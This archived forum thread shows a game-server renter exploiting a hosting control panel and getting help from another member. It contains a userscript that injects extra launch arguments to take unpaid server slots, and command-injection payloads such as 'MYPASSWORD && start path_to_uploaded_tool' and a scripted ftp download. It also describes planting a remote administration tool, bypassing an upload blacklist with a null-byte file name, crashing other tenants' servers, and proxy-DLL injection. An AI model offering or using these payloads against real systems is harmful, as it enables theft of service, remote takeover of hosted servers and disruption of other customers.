Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 11:27

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 17 posts ] 
Author Message
 Post subject: Remote Server Command Line Bug
PostPosted: 31 May 2010 15:18 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Hi!

When i recently bought a cod4 server, i got acces to control panel of it, and after one night of playing, i thought of an idea . So i slept the night over, and next day i got into control panel, got into command line manager, checked what's the last command is writen in line (i had problems with rcon stealing, so server provider set me up with additional box to set the rcon password in command line), so last waht was writen in the line was +map_rotate, and my +set_rconpassword was jsut before it, so i typed in the rcon password setting box: PASSWORD +set sv_maxclients 64
and voila, i saved everything, restarted the server, and i had 64 usable slots, tho i paid for 12 :D

the trick is that if a command is repeated, the one that is stated as last will actually take the effect

i even wrote a greasemonkey script as a proof of conceptl, but i didnt release it anywhere till now (it's nothing special. you will have to adjust it to make it work on you game panel)
script:
Code:
function putValue(){

     var TheTextBox = new Array();
TheTextBox = document.getElementsByName("WebGridBuilder$ctl04$ctl01");
TheTextBox[0].value = 'PASS ' + '+set sv_maxclients ' + oITnew.value;

}
   var oITnew = document.createElement("input");
   oITnew.setAttribute("value","24");
   var oIT = document.getElementById("WebGridBuilder_ctl04_ctl00");
   var oPAR = oIT.parentNode;
   oPAR.insertBefore(oITnew,oIT);

   var oITnew1 = document.createElement("button");
   oITnew1.addEventListener('click',putValue,false)
   oITnew1.setAttribute("onClick","putValue");
   oITnew1.setAttribute("height","70");
   var oIT1 = document.getElementById("WebGridBuilder_ctl04_ctl00");
   var oPAR1 = oIT1.parentNode;
   oPAR1.insertBefore(oITnew1,oIT1);



i know, it looks awfull, but it works just fine
to make this work, you need to get elements of the textbox to write to (in my case, first element didnt have id, so i had to get it by name)

this SHOULD work with most game panels, except if some have filtering (i doubt it, as i didnt see aynone post this kind of exploit aynwhere, tho i could be wrong)

WARNING: your server provider will most likely see that you modified the command line, and suspend your server. USE AT YOUR OWN RISK


Top
 Profile  
 
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 31 May 2010 16:58 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
there is also something that "could" be possible ("could" because maybe some hosters are vulnerable) and is interesting too: commands injection

for example:
PASSWORD & ps -aef
PASSWORD && ps -aef
PASSWORD ; ps -aef

(and maybe an additional ; echo in case PASSWORD is used in the middle of the command for launching the server).
where "ps -aef" is only an example of system command to execute (for linux, but it's the same on windows too).
I don't know how are managed these hosters anyway it's not to exclude the possibility of getting control over the other hosted servers or running a shell and so on.

only an idea in case someone has not tried it yet.


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 31 May 2010 19:08 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
well, i will try that
but i can take the control over the server by simply deleting the executable of game, replacing with, lets say remote administration tool, configuring the rat exe to ignore the all startup commands usually used for normal server starting, any simply rename my rat to original server .exe name, then all what is left to do is execute it
tho there is a slight problem: you cant delete the server .exe, but fortunetely protection is pretty weak, all i have to do is enable the checkbox
did it like this:

Code:
function disableCheck()
{      
   var e = document.getElementById("CHECKBOXID1");
             e.disabled=false;
   //var z = document.getElementById("CHECKBOXID2");
             //z.disabled=false;
}

disableCheck()


i never actually tested this method, but i have a strong feeling that it would work (as i can delete the servers exe)


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 31 May 2010 22:17 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Quote:
PASSWORD & ps -aef
PASSWORD && ps -aef
PASSWORD ; ps -aef


Hmm, my hoster is running windows server
so i thought that i'd give this a try, and as i dont know much about those commands, i googled it (google is probably my best friend) and came to information on unix servers, and here is where i came to stall

this is my command line:
Code:
+set fs_savepath D:\UserFiles\K9372\GameServers\TC27072318654272127623234\ +set dedicated 2 +set net_ip XXX.XXX.XXX.XXX +set net_port 28960 +set sv_maxclients 12  +set fs_game "mods/promodlive204" +set sv_punkbuster 1  +exec server.cfg  +set rcon_password XXX >><<  +map_rotate 

X replaces sensitive data
>><< is the place where i can "inject" commands to, so line modified for 64 users would look like this:
Code:
+set fs_savepath D:\UserFiles\K9372\GameServers\TC27072318654272127623234\ +set dedicated 2 +set net_ip XXX.XXX.XXX.XXX +set net_port 28960 +set sv_maxclients 12  +set fs_game "mods/promodlive204" +set sv_punkbuster 1  +exec server.cfg  +set rcon_password XXX +set sv_maxclients 64  +map_rotate 


now, im not really sure how would the command line look like when i would put PASSWORD & ps -aef in
as i dont get what password actually is, and what ps -aef stands for
im sorry if im bothering you, to this isnt really important to me, it really bugs me when i leave something half done :-S


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 15:14 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
on windows obviously you will need to replace ps -aef with another better command (which is also the same thing you must do on linux, mine was only an example).
the real difference between win and linux is that the "&" symbol used only linux to set the original command in background on windows acts just like the "&&" one which is a concatenation of commands.
for example:
Code:
Z:\>echo first_command && echo second_command
first_command
second_command
so, in conclusion, any command you inject will be executed when the process finishes, so immediately after the server is stopped.

and yes this "trick" doesn't add something to the one of the substituition of the exe, so it's a valid alternative only if the admin can't touch the remote game's executable


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 17:26 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
okay, if i got it right, i would just put
Code:
&& echo any_command

at the end of my command line, regardless of fact that game starting arguments are first commands (and i cant modify them, but i can overwrite them)?

and, for that commands, it would be anything that can be done in command prompt, for instance:
Code:
&& start notepad
?


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:18 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
yeah so the final "password" you should use would be:
Code:
MYPASSWORD && start notepad && echo list

I have added the final "list" only to avoid to specify that you must leave an empty space after "echo".
you can also build text files through output redirections and so abusing them for building bat files or list of commands for ftp (yeah the ftp client of windows can be scripted), example:
Code:
MYPASSWORD && echo first command > file.bat && echo second command >> file.bat && echo third command >> file.bat && file.bat && echo list
or
Code:
MYPASSWORD && echo open ftp.openssl.org > ftp.txt && echo anonymous >> ftp.txt && echo anonymous_pass >> ftp.txt && echo get /snapshot/README >> ftp.txt && echo quit >> ftp.txt && ftp -s:ftp.txt && echo list


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:33 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
so what i could do would be: just upload a remote administration tool add:
Code:
MYPASSWORD && start path_to_uploaded_tool && echo list
in command line, and then i restart the server, and stop it again
if this is correct, i would see my server's ip as a zombie in rat client?


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:37 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
yes, after having uploaded the rat server (for example using the ftp example above) it's enough to use that command-line you specified to start it.
maybe in some cases could be necessary to "tune up" a bit the example we showed but in general it looks all correct


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:39 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
thanks for your help
i would try it straight away, but i guess it's not right to take down a server whne it's full...
when ithink about it, its most of the times full, so il have to test it locally i guess


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 01 Jun 2010 18:45 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
oh, by the way: i can crash all game servers running punkbuster on that machine, it would go like this:

+set fs_savepath D:\UserFiles\K9372\GameServers\TC27072318654272127623234\

that is line wehere my pb save dir is located, i can change it to same dir as other pb dirs, and then restart pb on my server multiple times, which would automatically restart the servers which operate with that dir

bah, this bug is full of possible exploits, i may have to write to hoster to check the filtering of input. but i'l first look what i can actually do with it


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 17:26 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
I contacted my server provider, and we "kinda" solved the problem: they cant change the panel to filter out things, but they set it up so that whenever server settings change (maxclients, password...) they get a notification, so they can ban the server, or something, im not sure yet...
still, that wont stop anyone from rooting the server, as that shouldnt get supply them notification


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 18:51 

Joined: 27 May 2010 19:08
Posts: 23
Can't they just set a max amount of characters?


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 21:22 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
they can do tons of things, but they didn't actually develop the gamepanel, so they have to tell the dev to fix it, but i highly doubt that they will...
anyways, best and easiest way would be to filter out additional commands from input


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 07 Jun 2010 21:54 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Okay, i figured out that i can delete anything from the server, even if they strictly said that it cannot be done

here is their message: Also, game panel system by itself does not allow upload of exe, dll, php, bat and other extension nor delete cod4.exe or other dll, exe files.

that's translated from my language (google was core of translation, but i had to correct few things. bah, i hate google, tho its my best friend :D)

here is the proof that i deleted .EXE file, only through their own file manager (tho with my assist :D)

http://img261.imageshack.us/img261/4695/w3spdel.png


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 08 Jun 2010 21:22 

Joined: 08 May 2010 17:58
Posts: 55
Location: In vast nothingness of space...
Decided to take a good bite on their security :D

So i guess il be updating this thread as i find new potential exploits

btw. i warned them about deleting the files, told them how i did it, and they apparently posted a ticket to gpanel dev's, and today, they wanted to thank me for letting them know there is a bug with 2 free extra slots on my server =)

Anyways, i thought that i "scanned" everything well, and that there was no obvious bugs, but i guess i was wrong
With a bit of researching, i came to idea that i could upload an exe file even if it is blacklisted (yeah, i guess that is only protection)
so i didnt uplaod anything, but instead made a new empty file, and saved it as: file.exe%00.txt
as you can see, null terminator actually makes blacklist filter to fail (not detect that it ia actuallyan exe file)
even if file manager show that it is an .txt document, it completely acts like an exe file (cant delete it without tool, just like i deleted iw3sp.exe, so basically it has all attributes of an exe file)

im still figuring out how could this be exploited (im sure it can, almost 96%, hehe)

EDIT: I think that when i try to stream the file, it gets executed, but nothing happens because it id simply a dummy exe
so it wont open asother txt files (even empty one) but it will instead execute itself, but i doubt this. will see anyways...


Top
 Profile  
 
 Post subject: Re: Remote Server Command Line Bug
PostPosted: 14 Jun 2010 15:49 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
if you can't delete/replace the exe remember that you can ever:
- create a proxy dll for injecting your code (for example wsock32.dll)
- if the game supports dll mods (so not vm one) then you can start your code as a mod


Top
 Profile  
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 17 posts ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: